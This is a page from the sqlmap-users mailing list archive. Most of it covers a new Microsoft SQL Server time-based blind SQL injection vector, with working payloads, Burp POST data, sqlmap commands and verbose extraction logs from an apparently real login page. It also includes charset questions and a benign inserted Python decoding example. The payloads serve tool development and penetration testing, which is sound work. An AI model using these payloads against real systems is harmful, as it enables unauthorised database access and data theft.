sqlmap-users Mailing List for sqlmap (Page 111)
From: Miroslav S. <mir...@gm...> - 2011-01-18 11:11:38

hi mitchell. thank you for your answer. i thought that nobody would :)

we've done some serious work these days in this field and would like to have it "stabilized". plz report any "strange" behavior in this field if you encounter it.

kr

On Tue, Jan 18, 2011 at 12:01 PM, mitchell <mit...@tu...> wrote:
> Hi Miroslav,
>
> In say 80% of the cases I dealt with Bulgarian sites, the data in the
> database used the same encoding as the encoding announced on the webpage,
> usually CP-1251. The rest use UTF.
>
> # mitchell
>
> On 17 Jan 2011 16:52, "Miroslav Stampar" <mir...@gm...> wrote:
>> Hi all.
>>
>> I have a general question to all those pentesters that are retrieving data
>> from sites with "funny" charset encodings (...russian, chinese...).
>>
>> What should be the general "consensus" for data retrieval:
>>
>> A) assume that the backend DBMS uses the "utf8" charset encoding
>> or
>> B) treat data retrieved with the same encoding as used in the page
>> or
>> C) find out the proper collation used and use that one? (i am not a fan of
>> this one :)
>> or
>> D) don't care (some people tend to use mixed collations which is quite
>> romantic)
>>
>> Also, I would like to ask you all to try out the latest revision with
>> cases that could be problematic and report impressions.
>>
>> Kind regards

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
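The A/B choice above (assume utf8 in the DBMS, or trust the charset the page announces) comes down to how retrieved bytes get turned into text. The routine below is an added example written for this thread, not sqlmap's own code: it parses the charset out of a Content-Type value and decodes retrieved bytes, trying UTF-8 strictly first and the page charset second. The sample rows are constructed, and the site they stand for is hypothetical.

```python
"""Turning retrieved bytes into text when the page charset and the DBMS
charset may differ (the A/B question in the thread).  Added example, not
sqlmap code; the sample rows below are constructed."""

import re
from typing import Optional, Tuple


def charset_from_content_type(content_type: str) -> Optional[str]:
    """Pull the charset parameter out of a Content-Type header value,
    e.g. 'text/html; charset=windows-1251' -> 'windows-1251'."""
    match = re.search(r"charset=[\"']?([A-Za-z0-9_.:-]+)", content_type, re.I)
    return match.group(1).lower() if match else None


def decode_retrieved(raw: bytes, page_charset: Optional[str]) -> Tuple[str, str]:
    """Decode bytes pulled out of the DBMS; returns (text, charset_used).

    Order matters: UTF-8 is tried first because it is self-validating
    (a byte sequence either is or is not well-formed UTF-8), while a
    single-byte code page such as cp1251 decodes almost any bytes and
    would turn UTF-8 data into mojibake without complaint.  Only when the
    bytes are not valid UTF-8 do we fall back to what the page announced
    (option B); without a usable announced charset we keep latin-1 so that
    no byte is lost, even though the result may be unreadable."""
    try:
        return raw.decode("utf-8"), "utf-8"                 # option A, strict
    except UnicodeDecodeError:
        pass
    if page_charset:
        try:
            return raw.decode(page_charset), page_charset   # option B
        except (UnicodeDecodeError, LookupError):
            pass
    return raw.decode("latin-1"), "latin-1"                # lossless last resort


# Constructed sample rows: the same value as stored by a cp1251 column and
# by a utf8 column of a hypothetical Bulgarian site.
CP1251_ROW = "Иван".encode("cp1251")   # b'\xc8\xe2\xe0\xed'
UTF8_ROW = "Иван".encode("utf-8")      # b'\xd0\x98\xd0\xb2\xd0\xb0\xd0\xbd'

if __name__ == "__main__":
    page = charset_from_content_type("text/html; charset=windows-1251")
    for row in (CP1251_ROW, UTF8_ROW):
        print(row, "->", decode_retrieved(row, page))
    print(CP1251_ROW, "with no page charset ->", decode_retrieved(CP1251_ROW, None))
```

The caveat a practitioner should keep in mind: a very short cp1251 value can by chance be well-formed UTF-8 (an uppercase letter in 0xC2-0xDF followed by a byte in 0x80-0xBF), so the UTF-8-first check is safest when applied to a whole column or table rather than to each cell in isolation.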
From: Andres R. <and...@gm...> - 2011-01-18 10:48:38

+1 !

--
Andres Riancho

On Jan 17, 2011 8:34 PM, "Miroslav Stampar" <mir...@gm...> wrote:
> ...but still, i must say that this is quite good idea:
> "One way to increase the quality with little speed overhead would be an option to verify the charac...
> and we'll try to implement it
>
> kr
>
> On Tue, Jan 18, 2011 at 12:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>> Hi Steve.
>> ...
From: Antonios A. <ant...@gm...> - 2011-01-18 06:33:42

Hi Miroslav,

thanks a lot. It does work. I really appreciate that.

regards

Antonios

2011/1/18 Miroslav Stampar <mir...@gm...>
> Hi Antonios.
>
> You probably want to use switch --batch:
>
> "--batch Never ask for user input, use the default behaviour"
>
> KR
>
> On Mon, Jan 17, 2011 at 10:36 PM, Antonios Atlasis <ant...@gm...> wrote:
>>
>> Hello to the list.
>>
>> while trying to parse targets from webscarab logs, I'd like to ask you if
>> there is an option to automatically answer "Yes" to sqlmap questions to test
>> the several URLs.
>>
>> Thanks in advance
>>
>> Antonios
>>
>> ------------------------------------------------------------------------------
>> Protect Your Site and Customers from Malware Attacks
>> Learn about various malware tactics and how to avoid them. Understand
>> malware threats, the impact they can have on your business, and how you
>> can protect your company and customers by using code signing.
>> http://p.sf.net/sfu/oracle-sfdevnl
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 02:17:08

On 01/17/2011 09:08 PM, Miroslav Stampar wrote:
> "Since you seem anxious, I'll send the warm up." - you've thought that
> i was kidding :)
>
> it was really a sincere mail and this is the core part:
> "it looks like an SQL abomination, and I still can't believe it, but it
> appears that this really works"

Nah, just hadn't read that email yet, was talking about your excitement from before.. No worries mate.

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Steve P. <ste...@gm...> - 2011-01-18 02:11:54

On 01/17/2011 08:47 PM, Miroslav Stampar wrote:
> Steve.
>
> i owe you an apology and congrats - it appears that you've found a new
> injection vector.
>
> it looks like an SQL abomination, and I still can't believe it, but it
> appears that this really works:
>
> SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1'
>
> i repeat, it looks like an SQL abomination but it works. i've just
> tried with SSMS.
>
> kr
>
> p.s. i am still shocked :)
> p.p.s. you are directly going into doc/THANKS :)

You're welcome. If sqlmap wasn't so easy to add new vectors to, I probably never would have shared that this works, just for not knowing no one else knew it works ;-)

Thanks for an excellent product. (both of you, and all the other contributors over the years)

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:08:52

"Since you seem anxious, I'll send the warm up." - you've thought that i was kidding :)

it was really a sincere mail and this is the core part:
"it looks like an SQL abomination, and I still can't believe it, but it appears that this really works"

On Tue, Jan 18, 2011 at 3:05 AM, Miroslav Stampar <mir...@gm...> wrote:
> well, i've apologized already. i've realized 15 minutes ago that this
> really is a new sql injection vector.
>
> you can find yourself in the latest revision commit of doc/THANKS file.
>
> kr
>
> On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote:
>> On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
>>> ok, fair enough.
>>>
>>> please just send one of payloads used for data retrieval (something
>>> like this one):
>>>
>>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>>>
>>> you'll see them with -v 3. you can censor table names. please, i just
>>> want to see something workable used for data retrieval (just spot
>>> those payloads with '>' inside)
>>>
>>> kr
>>
>> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part
>> yet. ;-)
>>
>> [09:41:40] [INFO] fetching database names
>> [09:41:40] [INFO] fetching number of databases
>> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
>> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:37] [INFO] retrieved: 24
>> [09:43:37] [DEBUG] performed 10 queries in 117 seconds
>>
>> --
>> | Steven Pinkham, Security Consultant |
>> | http://www.mavensecurity.com |
>> | GPG public key ID CD31CAFB |
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:05:55

well, i've apologized already. i've realized 15 minutes ago that this really is a new sql injection vector.

you can find yourself in the latest revision commit of doc/THANKS file.

kr

On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
>> ok, fair enough.
>>
>> please just send one of payloads used for data retrieval (something
>> like this one):
>>
>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>>
>> you'll see them with -v 3. you can censor table names. please, i just
>> want to see something workable used for data retrieval (just spot
>> those payloads with '>' inside)
>>
>> kr
>
> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part
> yet. ;-)
>
> [09:41:40] [INFO] fetching database names
> [09:41:40] [INFO] fetching number of databases
> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
> [09:43:37] [INFO] retrieved: 24
> [09:43:37] [DEBUG] performed 10 queries in 117 seconds
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 01:59:22

On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
> ok, fair enough.
>
> please just send one of payloads used for data retrieval (something
> like this one):
>
> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>
> you'll see them with -v 3. you can censor table names. please, i just
> want to see something workable used for data retrieval (just spot
> those payloads with '>' inside)
>
> kr

Since you seem anxious, I'll send the warm up.. Hasn't hit the good part yet. ;-)

[09:41:40] [INFO] fetching database names
[09:41:40] [INFO] fetching number of databases
[09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [INFO] retrieved: 24
[09:43:37] [DEBUG] performed 10 queries in 117 seconds

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:48:02

Steve.

i owe you an apology and congrats - it appears that you've found a new injection vector.

it looks like an SQL abomination, and I still can't believe it, but it appears that this really works:

SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1'

i repeat, it looks like an SQL abomination but it works. i've just tried with SSMS.

kr

p.s. i am still shocked :)
p.p.s. you are directly going into doc/THANKS :)

On Tue, Jan 18, 2011 at 2:33 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote:
>> Steve,
>>
>> Are you saying that a query like:
>>
>> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10'
>>
>> is MSSQL-syntactically correct and works? If so, odd news :)
>
> Yes, sometimes interesting discoveries come from not knowing any better,
> and flinging poo at the app. ;-)
>
> Unfortunately, I don't have a MS test lab available, but I can confirm
> that the injection works just fine on this SQL Server 2008 / ASP classic
> application, and can't think of another reason why it would.
>
> First I tested in burp, with post data:
> id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf
> there is a 23 second delay with the app, and with
> id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf
> there is a 3 second delay.
>
> After adding the patch, sqlmap has so far extracted enough of the
> version details and banner to be sure the patch works on this particular
> app.
>
> I wish I had a bunch of SQL server versions to test it on, but I don't
> at the moment. Anyone else have a MSDN subscription or test lab already
> built who can verify this is repeatable?
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 01:34:02

On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote:
> Steve,
>
> Are you saying that a query like:
>
> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10'
>
> is MSSQL-syntactically correct and works? If so, odd news :)

Yes, sometimes interesting discoveries come from not knowing any better, and flinging poo at the app. ;-)

Unfortunately, I don't have a MS test lab available, but I can confirm that the injection works just fine on this SQL Server 2008 / ASP classic application, and can't think of another reason why it would.

First I tested in burp, with post data:
id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf
there is a 23 second delay with the app, and with
id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf
there is a 3 second delay.

After adding the patch, sqlmap has so far extracted enough of the version details and banner to be sure the patch works on this particular app.

I wish I had a bunch of SQL server versions to test it on, but I don't at the moment. Anyone else have a MSDN subscription or test lab already built who can verify this is repeatable?

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:25:20

ok, fair enough.

please just send one of payloads used for data retrieval (something like this one):

[02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)

you'll see them with -v 3. you can censor table names. please, i just want to see something workable used for data retrieval (just spot those payloads with '>' inside)

kr

On Tue, Jan 18, 2011 at 2:20 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 07:54 PM, Miroslav Stampar wrote:
>> hi again.
>>
>> have you tried to use it? i am interested in data retrieval part :)))))
>>
>> (please use -v 3)
>>
>> kr
>
> And yes, I have pulled data with it. That's where the time based data
> with a few errors came from before.
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 01:20:18

On 01/17/2011 07:54 PM, Miroslav Stampar wrote:
> hi again.
>
> have you tried to use it? i am interested in data retrieval part :)))))
>
> (please use -v 3)
>
> kr

And yes, I have pulled data with it. That's where the time based data with a few errors came from before.

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Steve P. <ste...@gm...> - 2011-01-18 01:17:58

On 01/17/2011 07:54 PM, Miroslav Stampar wrote:
> hi again.
>
> have you tried to use it? i am interested in data retrieval part :)))))
>
> (please use -v 3)
>
> kr

Can you be more specific as to what you would like to see? I have to redact the data for a few reasons, and the less I can send the better...

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:54:43

hi again.

have you tried to use it? i am interested in data retrieval part :)))))

(please use -v 3)

kr

On Tue, Jan 18, 2011 at 1:48 AM, Steve Pinkham <ste...@gm...> wrote:
> On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
>> Hi Steve.
>>
>> Thank you for your patch but I am not sure from SQL's perspective how
>> this could work?
>>
>> So, basically, you are proposing time based sql injection payload (e.g.):
>>
>> IF(1=1) WAITFOR DELAY '0:0:1'
>>
>> and to be honest, I am not sure in which form, other than "stacked"
>> this could fit in??
>>
>> KR
>
> Dunno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-)
> Should work as an OR or AND statement, but then the present logical
> state of the query matters.
>
> Here's the output from my successful run using the patch, sanitised for
> public viewing:
> ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'
>
>     sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [*] starting at: 05:54:02
>
> [05:54:02] [INFO] using 'bogonExampleData' as session file
> [05:54:02] [INFO] testing connection to the target url
> [05:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
> [05:54:02] [INFO] testing if the url is stable, wait a few seconds
> [05:54:04] [INFO] url is stable
> [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable
> [05:54:08] [INFO] testing sql injection on POST parameter 'id'
> [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
> [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE clause'
> [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
> [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase time-based' injectable
> [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
> POST parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
> sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
> ---
> Place: POST
> Parameter: id
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase time-based
> Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
> ---
>
> [05:55:18] [INFO] testing Microsoft SQL Server
> [05:55:38] [INFO] confirming Microsoft SQL Server
> [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, ASP, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
> [05:56:40] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 18 times
> [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'
>
> [*] shutting down at: 05:56:40
>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 00:48:25

On 01/17/2011 07:02 PM, Miroslav Stampar wrote:
> Hi Steve.
>
> Thank you for your patch but I am not sure from SQL's perspective how
> this could work?
>
> So, basically, you are proposing time based sql injection payload (e.g.):
>
> IF(1=1) WAITFOR DELAY '0:0:1'
>
> and to be honest, I am not sure in which form, other than "stacked"
> this could fit in??
>
> KR

Dunno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-) Should work as an OR or AND statement, but then the present logical state of the query matters.

Here's the output from my successful run using the patch, sanitised for public viewing:
./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server'

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 05:54:02

[05:54:02] [INFO] using 'bogonExampleData' as session file
[05:54:02] [INFO] testing connection to the target url
[05:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[05:54:02] [INFO] testing if the url is stable, wait a few seconds
[05:54:04] [INFO] url is stable
[05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable
[05:54:08] [INFO] testing sql injection on POST parameter 'id'
[05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause'
[05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE clause'
[05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based'
[05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase time-based' injectable
[05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns'
POST parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
---
Place: POST
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase time-based
Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf
---

[05:55:18] [INFO] testing Microsoft SQL Server
[05:55:38] [INFO] confirming Microsoft SQL Server
[05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
